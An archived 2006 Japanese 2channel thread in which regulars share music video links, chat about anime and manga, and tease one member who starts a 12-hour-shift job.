>10ちゃん

ネオアコっていいの?(´∀`*)
ちょっと敬遠してたんだけど


117 :星の王子様 ◆X0Z.ew5Xkc :2006/07/19(水) 22:14:14 ID:YOZiec5b
Mマガで特集してるし入門しようかな(´∀`*)


118 :10ちゃん ◆HzwJN7quoQ :2006/07/19(水) 22:40:00 ID:8xTGQPQa
(・人・*)
>王子
そうですね〜♪今も、たまに聴きます。
フリッパーズの影響大でしたから。

例えば、こんな。。。

Aztec Camera『All I need is everything』
http://www.youtube.com/watch?v=6QgpTkt7HN8&mode=related&search=Aztec%20Camera

Trashcan Sinatras『All the Dark Horses』
http://www.youtube.com/watch?v=ZI1SSJAy1XI&search=Trashcan%20Sinatras

Prefab Sprout『When Love Breaks Down』
http://www.youtube.com/watch?v=7m2dvkAItYk&search=Prefab%20Sprout%20


このへんの曲でも、クラブイベントが成立していたんですねえ。。。

119 :10ちゃん ◆HzwJN7quoQ :2006/07/19(水) 22:44:46 ID:8xTGQPQa
(・人・*)
>>117
そうですか!Mマガで特集を!!
蒼い頃を思い出す。。。
BDシャツに、リーバイスのスタープレスト&キャスケットを被って。。。

120 :星の王子様 ◆X0Z.ew5Xkc :2006/07/20(木) 00:01:55 ID:gtbXPL8D
>>118-119
どれも結構いいね(´∀`*)
アズテックキャメラは重かったから「ovb・・何とか」って曲見たら
ちょいラテンテイストで良かった。
なんか懐かしい音色だあ。チャレンジしてみるかな。



121 :アルマンス ◆DCJ0JoRHW2 :2006/07/20(木) 12:07:26 ID:+/VUsfUg
おはです〜o(^O^)o

>>113
そもそも洋楽聴いてる人に「違いがわかる俺(私)って格好いい?」みたいな
傾向がありますからねえ^^;
そういう人が洋楽にすがり付くのか?・・・

>>114
そんな〜俺は洋楽貴族軍団の兵隊に過ぎないですよ〜(^^ゞ
王子の洋楽板支配の尖兵になれれば本望ですう〜^^ノ

>>115
10ちゃんはオールラウンダーですね〜^^ノ
Alphaって知らないですう〜

>>118
真ん中のバンドも知らないですう〜
プリファブ・スプラウトのVoの人が着ているのは
タンク・トップぢゃなくてランニングですう〜^^;


ブクオに立ち読みに行こ(._.A)

122 :10ちゃん ◆HzwJN7quoQ :2006/07/20(木) 17:28:05 ID:ZMYHia6O
(・人・*)♪

Alphaです。
http://www.amazon.co.jp/gp/product/B000003MK6/249-4439009-3522750?v=glance&n=561956

123 :星の王子様 ◆X0Z.ew5Xkc :2006/07/20(木) 23:44:54 ID:Dwa48UcN
>>122
alphaも懐かしい・・と言っていいのかな?(´∀`*)
覚えてる人少ないんじゃない?

>>121
おはです(´∀`*)ノハァァ

124 :アルマンス ◆DCJ0JoRHW2 :2006/07/21(金) 15:20:33 ID:YIeJrDRK
>>122
浸り系ですかね〜
なかなかいいムードですね^^ノ


さ〜てデスノも完結して全巻揃ったから纏め読みすっか^^ノ
途中まで読んでたけど忘れちゃったから最初から読もう^^ノ

125 :アルマンス ◆DCJ0JoRHW2 :2006/07/21(金) 19:25:55 ID:YIeJrDRK
刃売るまで小一時間寝よ。。

126 :マリア:2006/07/21(金) 21:09:36 ID:lkczAIxZ
もうハウルを見ても泣かないか試してみるw

127 :アルマンス ◆DCJ0JoRHW2 :2006/07/21(金) 22:10:08 ID:3nG+OvhK
キムタコが違和感ないのが意外。
こいつなんでもそつなくこなすな〜
ムカつくわ〜

128 :星の王子様 ◆X0Z.ew5Xkc :2006/07/21(金) 23:45:09 ID:8zbP5IIF
ハウル意味不明だったデスノート(´∀`*)


129 :アルマンス ◆DCJ0JoRHW2 :2006/07/21(金) 23:49:57 ID:YIeJrDRK
別スレに書いた感想コピペ^^ノ
確かにストーリーよく分かんなかった^^;
ソフィーの呪いはどの時点で解けたの?^^;

781 名前: アルマンス ◆DCJ0JoRHW2 [美少女sage] 投稿日: 2006/07/21(金) 23:45:17
刃売る見たで〜
相変わらずストーリーが混沌としてて分かりづらかったけど、
ここ最近の“混乱三部作”の中では一番面白かった^^ノ
もののけの欠点→ハッピーエンドになってる
千と千尋の欠点→ヒロインが美少女(大部分ババアだけど^^;)
に修正されてるし、
弟子のガキ、火の悪魔、カカシ、犬、荒地の魔女と、脇キャラが立ってるのがいい感じだった^^ノ
もう少しプロットを整理して分かり易くして欲しいけどね^^ノ

130 :マリア:2006/07/22(土) 16:55:09 ID:thqe960g
泣きませんでした
途中で寝てしまいました

・・・きっともう傷は癒えたのでしょうw

今日何故か携帯から見ると「板がない」って出るのよね。。

131 :名盤さん:2006/07/22(土) 17:30:41 ID:MAOZ26z9
おおむね、ゲロ男のまわりはキチガイです

132 :名盤さん:2006/07/22(土) 21:45:16 ID:MAOZ26z9
外道戦記

133 :外道 ◆Gero/dXaAU :2006/07/22(土) 21:52:02 ID:f2tZtxlW
「外道」といふのは別ハンの一つです^^ノ
ほかに「下郎」といふのもあります^^ノ

134 :10ちゃん ◆HzwJN7quoQ :2006/07/22(土) 22:12:04 ID:ZEX/+di6
(・人・*)
外道です。カッコエエ!!
http://www.youtube.com/watch?v=uHfBhJsqrD8&search=%E5%A4%96%E9%81%93

カブキロックスじゃないよ。


今日、中古で
Rhythm of the Saints/Paul Simon と
今更ですが、JUSTIFIED/Justin Timberlakeを購入!
ネプチューンズ、いい仕事してますね!

Justin Timberlake『Senorita』
http://www.youtube.com/watch?v=4J5ozCnNS3I&search=Justin%20Timberlake

135 :アルマンス ◆DCJ0JoRHW2 :2006/07/22(土) 23:32:53 ID:f2tZtxlW
>じゅうちゃん
あ〜外道って名前は聞いたことある〜
これ73年!? めっちゃカッコイイ!!
日本にもロックがあったんやね〜

ジャスティンてイン・シンクの人ですか〜
白人にしてはなかなかやりますな〜
The Neptunesといへばこれでせう^^ノ

Jay-Z/I Just Wanna Love U (Give It 2 Me)
http://www.youtube.com/watch?v=5BnY2GXjOIo

Pharrellのソロ楽しみ〜o(^O^)o

136 :アルマンス ◆DCJ0JoRHW2 :2006/07/22(土) 23:43:43 ID:f2tZtxlW
これも^^ノ

Pharrell Feat. Jay-Z/Frontin'
http://www.youtube.com/watch?v=L2cOrjs172Q

137 :10ちゃん ◆HzwJN7quoQ :2006/07/22(土) 23:50:57 ID:ZEX/+di6
(・人・*)♪

>ジャスティンてイン・シンクの人ですか〜
Yes!

ファルセットVoは、どうも苦手なんですけど
PharrellはOK!!
ソロ、出るんですか?

138 :アルマンス ◆DCJ0JoRHW2 :2006/07/23(日) 00:07:16 ID:48KeZ+IA
ファレルのファルセットってもろカーティスの真似(失礼^^;)ですよね〜
ソロ出ますよ〜♪
輸入盤は明日、国内盤は今度の火曜日に♪
Frontin'は入らないみたいだけど〜
でもぼくちんPoohだから当分買えないにゃ´-`

139 :名盤さん:2006/07/23(日) 00:26:39 ID:y9bpF+r1
ゲロマンスは別ハン作り過ぎ

140 :10ちゃん ◆HzwJN7quoQ :2006/07/23(日) 00:41:28 ID:GRRYPBHx
(・人・*)!
そうそう!カーティス似ですね!!
とり合えず、視聴しに行ってみよう♪

141 :アルマンス ◆DCJ0JoRHW2 :2006/07/23(日) 00:42:57 ID:48KeZ+IA
え〜でも全部カミングアウトしてるしぃ〜〜〜
悪質な自演とかやらないしぃ〜〜〜

142 :アルマンス ◆DCJ0JoRHW2 :2006/07/23(日) 00:43:53 ID:48KeZ+IA
>>140
感想聞かせてくだちいo(^O^)o

143 :名盤さん:2006/07/23(日) 11:08:16 ID:y9bpF+r1
ゲロマスは自分で思ってないだけで充分、悪質だよ

144 :アルマンス ◆DCJ0JoRHW2 :2006/07/23(日) 11:38:58 ID:48KeZ+IA
自分で思ってないならそれで幸せでつ^^
不幸とか孤独って自分で気付いちゃうところから始まるんですよね^^ノ

145 :名盤さん:2006/07/23(日) 20:20:09 ID:y9bpF+r1
不幸なゲロマス

146 :アルマンス ◆DCJ0JoRHW2 :2006/07/23(日) 21:18:43 ID:48KeZ+IA
一豊、やっと長浜2万石だよ^^;
かつてここまでスケールの小さい大河主人公がいただらうか^^;

147 :アルマンス ◆DCJ0JoRHW2 :2006/07/24(月) 02:17:19 ID:S557azFh
シカオちゃんの“ストーリー”のライヴ^^ノ
http://www.youtube.com/watch?v=Sv4sBLs6klk

148 :名盤さん:2006/07/24(月) 12:12:19 ID:j2OZUhYd
ゲロおやじよりはスケールでかいよ

149 :ゲロ男 ◆.Eml6ZUBuo :2006/07/24(月) 14:03:34 ID:nx1WxS23
・・・(^^;)

150 :範馬げろ ◆Gero/dXaAU :2006/07/24(月) 17:03:38 ID:nx1WxS23
仕事が決まったゲロよ☆
明日からゲロよ☆



12時間プラス残業の地獄ゲロよ・・・(;⌒▽⌒;)



リj ---一、`―--、_ lリ
リヽT愛iフi  f死jァ ii
ミハ   ノ    ノリ
`Zi  〈_,    ノリ
彡ハ、 、_,ー-、_, f゙:Y
~"戈ヽ `二´ r"::i

151 :範馬げろ ◆Gero/dXaAU :2006/07/24(月) 17:06:24 ID:nx1WxS23
ageてしまったゲロ・・・



リj ---一、`―--、_ lリ
リヽT愛iフi  f死jァ ii
ミハ   ノ    ノリ
`Zi  〈_,    ノリ
彡ハ、 、_,ー-、_, f゙:Y
~"戈ヽ `二´ r"::i

152 :名盤さん:2006/07/24(月) 19:08:24 ID:ce02Ha4z
私も先週「デスノート」全12巻まとめて読んだよ
久々に最後まで面白く読めた漫画だった
エルがいなくなってからはちょっと読む速度が鈍ったけど。

ゲロリン、仕事がんばってね

153 :名盤さん:2006/07/24(月) 19:42:48 ID:j2OZUhYd
本当に底辺なんだなあ…

154 :名盤さん:2006/07/24(月) 19:43:54 ID:j2OZUhYd
給料いくら?

155 :アルマンス ◆DCJ0JoRHW2 :2006/07/24(月) 20:05:17 ID:S557azFh
>>152
ありがと〜ごぜ〜ますだ^^ノ
仕事頑張りマッスル^^ノ

デスノまとめて読もうと思ってたけど、忙しくなったから
落ち着くまで封印しますだ^^ノ
給料出たらワンピ全巻買うつもりですだ^^ノ

>>153
大きなお世話ですだ^^

>>154
わかんないけど、手取り25くらい?
再来月、一ヶ月分の給料出たらここで報告しますだ^^ノ

156 :アルマンス ◆DCJ0JoRHW2 :2006/07/24(月) 20:46:45 ID:nx1WxS23
>>152
もすぃかして緑さんですか〜?

157 :名盤さん:2006/07/24(月) 21:42:35 ID:b4QW5SJE
wwwなんでわかると−?
しばらく前から復帰しとっとよー!
映画/映画音楽板には行っとらんばってん。。。


158 :名盤さん:2006/07/24(月) 22:00:29 ID:xh+MC5IH
なんで、全然働いてなかった身なのに、いきなり12時間労働とかすんの?
ぜってーやめるじゃん

159 :アルマンス ◆DCJ0JoRHW2 :2006/07/24(月) 22:19:30 ID:nx1WxS23
>>157
なんとなくわかりましたw
俺もあのスレにはしばらく行かないつもりです〜

>>158
ゼニの為じゃけん。
ます好きさんとの愛の為じゃけん。
辞めないよ、



多分。。

160 :星の王子様 ◆X0Z.ew5Xkc :2006/07/25(火) 00:08:39 ID:zKBxspDk
やあ(´∀`*)ノ☆

ゲロさん、シャバ復帰ご苦労様です。
12時間かあ・・2勤1休のところなら有りかな。




161 :星の王子様 ◆X0Z.ew5Xkc :2006/07/25(火) 00:10:09 ID:eyZCa83n
ねむくて死にそうふぁぃ(´∀`*)


162 :マリア:2006/07/25(火) 00:47:34 ID:TtZikVnU
アルマンスさん、社会復帰とりあえずおめ。
ます好きさんとの愛のため?辛い労働も耐えてくださいねww

163 :マリア:2006/07/25(火) 01:30:52 ID:TtZikVnU
>>147
それもいい曲ですね
スガシカオ、最近「デスノート」やら「はちくろ」で儲かってますねw

自分が思ってるよりも君は強い人間じゃないし
抱きしめる僕にしたって君と何も変わりなんてない

                   アシンメトリー好きです  

164 :名盤さん:2006/07/25(火) 13:52:40 ID:J1kL9A2T
すぐ辞めるかクビになるに100BET!

165 :アルマンス ◆DCJ0JoRHW2 :2006/07/25(火) 15:19:26 ID:0pR3chV6
なげぇ〜〜〜(T_T)

辞めたい・・・

166 :名盤さん:2006/07/25(火) 18:16:15 ID:J1kL9A2T
仕事中なのに2ちゃんかよ…
こりゃマジですぐ辞めるかクビだな

167 :名盤さん:2006/07/25(火) 18:29:49 ID:J1kL9A2T
レイズしていいか?

168 :10ちゃん ◆HzwJN7quoQ :2006/07/25(火) 20:10:47 ID:bSq7851B
(・人・*)!
ゲロさん、今日から社会復帰でしたか!
まあ、この時季の屋外の現場仕事と比べれば、、、前向きに。


おっ!!九州ん人の、おんなはるばい!

169 :アルマンス ◆DCJ0JoRHW2 :2006/07/25(火) 20:23:15 ID:0pR3chV6
あ〜疲りた・・・
12時間労働やったら2ちゃんなんかやってらんないよ・・・

>マリアさん
アシンメトリー、ようつべにありますよね・・・
最近増えましたね、シカオのビデオ・・・

>>166
3時休憩だよ・・・

>じゅうちゃん
無理です・・・
1、2ヶ月したら辞めよ・・・


帰ろ・・・

170 :マリア:2006/07/25(火) 20:38:26 ID:TtZikVnU
>>169
お疲れサマ。 もうギブアップですか?w
中田は一試合で12キロ走るんでしょ?ww 負けるなサッカーヲタ!

一ヶ月したら慣れるかもよ!
コニたんみたいな奥さんもらうんでしょ?

今日はゆっくり休んだらいいよ。2ちゃんに律儀にレスしなくていいからw

171 :アルマンス ◆DCJ0JoRHW2 :2006/07/25(火) 21:01:04 ID:0pR3chV6
観音菩薩様のようなマリアたんにはレスせずにはいられない・・・
とりあえず1ヶ月頑張ってみまつ・・・
コニたんは好みじゃないです・・・
梅津弥英子みたいな人がいいです・・・


ます好きさんにフラレた・・・
働く甲斐がなくなった・・・


おやすみなさい・・・

172 :マリア:2006/07/26(水) 19:57:01 ID:QsjEvkMS
>>171
なんとか慣れるといいねぇww

ます好きさんに振られたの? いつの間に(^^;)


うー・・・ ご愁傷様です。

173 :10ちゃん ◆HzwJN7quoQ :2006/07/26(水) 20:32:49 ID:vfiXpn+y
(・人・*)ノ
仕事疲れのゲロさんへ
リポD代わりにどうぞ!

http://www.youtube.com/watch?v=H6w2NBnHnnQ&search=Todd%20Rundgren%20
http://www.youtube.com/watch?v=iKMUQXofa3E&mode=related&search=KENNY%20RANKIN
http://www.youtube.com/watch?v=76W-Wkg49tg&search=janis%20ian

ハートウォーミングな曲をセレクトしました。
休日にでも聴いて下さい♪

174 :星の王子様 ◆X0Z.ew5Xkc :2006/07/26(水) 23:53:50 ID:2JKqjYGG
ゲロさん流石に今日はダウンかな(´∀`*)

175 :星の王子様 ◆X0Z.ew5Xkc :2006/07/26(水) 23:54:42 ID:2JKqjYGG
我輩も今帰宅ぞ。公務しんどいなぁっ(´∀`*)っっ


176 :アルマンス ◆DCJ0JoRHW2 :2006/07/27(木) 00:00:08 ID:PjUyuQTQ
おばんです〜^^ノ

いや〜疲れた^^;
12時間+30分残業で通勤時間と風呂は入って飯食ったら何かやる時間なんて
殆んどないもんな〜^^;

>マリアたん
ふられたのは勘違いですた^^ノ
順調にいちゃらぶ状態です^^ノ
なんとか勤め上げて稼ぐつもりです^^ノ
慣れればこっちのもんでしょう^^ノ

>じゅうちゃん
ありがとう^^ノ
今度の土曜にじっくり見てみます^^ノ
3つとも聴いたことないですね〜
ケニー・ランキンて人は名前も知らなかったです^^;



愛子ちゃんが可愛くなっててビクーリした。
女帝でいいじゃない。
佳子さんのところがまた女の子でありますように。。

ほいではおやすみなさい(._.A)ノシ

177 :アルマンス ◆DCJ0JoRHW2 :2006/07/27(木) 00:02:20 ID:xeb06iz1
>王子
御公務ご苦労様です〜^^ノ

疲れました^^;

おやすみなさい^^ノ

178 :10ちゃん ◆HzwJN7quoQ :2006/07/27(木) 20:01:28 ID:LYDPl8tK
(・人・*)ノ
王子も公務、ご苦労様です。
王子には、こちらを捧げます。
休日にコーヒーでも飲みながら、どうぞ。。。

http://www.youtube.com/watch?v=ytwSy9qM9Rg&search=bossanova
http://www.youtube.com/watch?v=02Up6zL49is&search=bossanova
http://www.youtube.com/watch?v=KE6QLdiFoos&search=bossanova

179 :アルマンス ◆DCJ0JoRHW2 :2006/07/27(木) 21:57:16 ID:xeb06iz1
おばんどす〜☆

会社への道が分からない^^;
朝はとりあえずルートを決めといてチャリで20分くらいなんだけど、
最短距離じゃないと思うんだよね^^;
帰りはいろいろルートを模索してるんだけど、暗くて道に迷ってしまう^^;
あっちの方は行ったことないからな〜^^;
山の方だから坂はあるし道が入り組んでるし^^;
俺って方向音痴なのよね^^;
今度の休みに地図を広げて調べてみよう^^ノ

180 :アルマンス ◆DCJ0JoRHW2 :2006/07/27(木) 22:46:37 ID:VyyuvlUZ
12時間労働で時給1200、残業&夜勤は1500です^^ノ
皆勤が1万あります^^ノ
チャリ通なのに交通費も出してくれます^^ノ
来週から夜勤専属になるかもしれません^^;
結構稼げるな〜^^ノ
頑張る甲斐があるわ^^ノ
車でも買うか、中古の^^ノ

181 :星の王子様 ◆X0Z.ew5Xkc :2006/07/28(金) 01:58:19 ID:ayISkUG2
>>178
ボサでつか(´∀`*)
休日にでも聴いてみます。コーヒー飲みながら。

>>179
勤務乙です(´∀`*)
ボクは眠いので寝るよう。。




182 :アルマンス ◆DCJ0JoRHW2 :2006/07/28(金) 19:12:24 ID:n76LinAd
今日は暇で定時(18:00)上がりでした^^ノ
こういうのは滅多にないそうです^^ノ
ラッキー^^ノ



休みだー\(^O^)/

183 :名盤さん:2006/07/28(金) 19:50:14 ID:pliSJxGY
バックレたんだろ

49 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)